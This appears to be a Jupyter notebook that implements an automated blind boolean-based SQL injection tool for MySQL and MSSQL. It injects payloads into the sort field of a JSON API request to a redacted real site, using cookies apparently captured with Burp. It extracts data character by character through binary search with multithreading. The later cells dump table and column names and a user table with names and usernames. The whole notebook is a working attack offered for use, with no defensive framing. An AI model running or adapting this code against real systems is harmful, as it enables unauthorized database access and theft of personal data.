In [3]:
import requests
#from requests_ntlm import HttpNtlmAuth
import json
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm_notebook

You have to just define:
1. Url with %s where to inject strings ' and 1=1 ' and ' and 1=0 ' and they work
2. response true_or false in get_bool
3. Multithreading options

In [ ]:

url = "http://xxxxx:10752//xxxxxx?beginDate=2019-07-08T00:00:00Z&branchId&clientViewType=2&email=xxxx'%s)--&endDate=2019-07-15T23:59:59Z"
multithreaded = True
threads = 16


In [5]:
import requests
def make_request(to_paste):
    session = requests.session()
    http_proxy   = "http://localhost:8080"

    proxyDict = { 
                 "https"   : http_proxy
                }

    burp0_url = "https://xxx.xxx.ru:443/api/1.0/drivers"
    burp0_cookies = {"IpLocationFrom": "mitishi", "_ga": "GA1.2.235024103.1568384218", "_fbp": "fb.1.1568384219375.431522795", "_gid": "GA1.2.1079674775.1568639486", "showChangeCity": "mitishi"}
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0"}
    burp0_json={"filter": {"login": "", "status": ""}, "limit": 10, "page": "", "sort": {"desc": True, "field": "(select if((select true %s),id,full_balance))"}}
    data = json.dumps(burp0_json,separators=(',',':'))
    data = data % to_paste
    r = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies,
                     #proxies=proxyDict, 
                     data=data,verify=False)
    #print (data)
    return r


In [ ]:

def get_bool(sql):
    while True:
        to_paste = (' and '+ sql + ' ')
        r = make_request(to_paste)
        if r.status_code != 200:
            raise Exception('code: %d, ошибка sql: %s'%(r.status_code,sql))
        try:
            js = json.loads(r.text)
            x = js
        except:
            #rerun
            continue
        if json.loads(r.text)['drivers'][0]['login']=='test' :
            return True
        else:
            return False

In [ ]:
#for check
print get_bool('1=1')
print get_bool('1=0')

In [4]:
DBMS = 'mysql' #'mssql')

In [ ]:
#MySQL
if DBMS == 'mysql':
    base_from_clause = 'FROM {table_name} {where} ORDER BY {column_name} limit 1 offset {row_num}'
    string_definition = 'SELECT %s'
    string_len_definition = 'SELECT length(%s)'
    string_char_definition = 'SELECT ASCII(SUBSTRING(%s,%d,1))'
    count_definition = 'SELECT count(*) FROM (SELECT * FROM %s %s)T'
    offset_shift=0

#MSSQL
if DBMS == 'mssql':
    base_from_clause = 'FROM (SELECT *, ROW_NUMBER() OVER(ORDER by [{column_name}])n FROM {table_name} {where})T WHERE n={row_num}'
    string_definition = 'SELECT %s'
    string_len_definition = 'SELECT len(%s)'
    string_char_definition = 'SELECT ASCII(SUBSTRING(%s,%d,1))'
    count_definition = 'SELECT count(*) FROM (SELECT * FROM %s %s)T'
    offset_shift=1

In [ ]:
def define_string(table_name,column_name,index):
    return string_definition%(column_name) + ' ' + get_from_clause(table_name,column_name,index)

In [ ]:
def get_from_clause(table_name,column_name,index,where=None):
    to_where = ''
    if where != None:
        to_where = 'WHERE '+where
    return base_from_clause.format(column_name = column_name,table_name = table_name,where = to_where,row_num = index)

In [ ]:
def define_string_len(table_name,column_name,index,where=None):
    return string_len_definition%(column_name)+ ' ' + get_from_clause(table_name,column_name,index,where)

In [ ]:
def define_string_char(table_name,column_name,index,string_pos,where=None):
    return string_char_definition%(column_name,string_pos) + ' ' + get_from_clause(table_name,column_name,index,where)

In [ ]:
def define_count(table_name,where=None):
    to_where = ''
    if where != None:
        to_where = 'WHERE '+where
    return count_definition%(table_name,to_where)

In [ ]:
def binary_search(s,start_val,start_val_defined=False):
    #define real_start_val:
    if not start_val_defined:
        while True:
            sql = '(%s)>%d' %(s,start_val)
            #print sql
            r = get_bool(sql)
            if r:
                start_val*=10
            else:
                break
    #now start_val > len
    cur_val = start_val/2
    move = start_val/4
    while True:
        sql = '(%s)>%d' %(s,cur_val)
        #print sql
        r = get_bool(sql)
        #print r
        if move<1:
            if r:
                return cur_val+1
            else:
                return cur_val
        if r: #(cur_val+1 - cur_val+2*move)
            cur_val+=move
        else:
            cur_val-=move
        move = move/2
    

In [ ]:
def get_count(table_name,where=None):
    s = define_count(table_name,where)
    return binary_search(s,32,False)
    

In [ ]:
def get_length_of_string(table_name,column_name,index,where=None):  
    s = define_string_len(table_name,column_name,index,where)
    return binary_search(s,32,False)

In [ ]:
def get_char(table_name,column_name,index,str_pos,where=None):
    s = define_string_char(table_name,column_name,index,str_pos,where)
    return chr(binary_search(s,256,True))

In [ ]:
def get_char_for_pool(chunk):
    return get_char(*chunk)

def get_string(table_name,column_name,index,where=None):
    l = get_length_of_string(table_name,column_name,index,where)
    r = ''
    if not multithreaded:
        for i in range(l):
            r+=get_char(table_name,column_name,index,i+1,where)
            #print r
        return r
    else:
        with ThreadPoolExecutor(max_workers=threads) as pool:
            r = ''.join(list(pool.map(get_char_for_pool,[(table_name,column_name,index,i+1,where) for i in range(l)])))
            return r


In [ ]:
%%time
threads=16
multithreaded=True
print get_string('information_schema.tables','table_name',1,'table_name=\'xxx\'')

In [ ]:
def get(columns,table_name,where=None):
    count = get_count(table_name,where)
    #print ('count %d' % count)
    res = []
    for i in range(count):
        cs = []
        for column in columns:
            cs.append(get_string(table_name,column,i+offset_shift,where))
        #print (cs)
        res.append(cs)
    return res

In [ ]:
get(['table_name'],'information_schema.tables')

In [ ]:
columns = {}
for t in tables:
    t = t[0]
    r = get(['column_name'],'information_schema.columns',"table_name='%s'"%t)
    columns[t]=r

In [ ]:
userTab = get(['FIO','UserName'],'temp_User')

In [ ]:
get_count('sysobjects')

In [ ]:
all_tables = get(['name'],'sysobjects')

In [ ]:
print get_string('temp_User','UserName',1).decode('cp1251')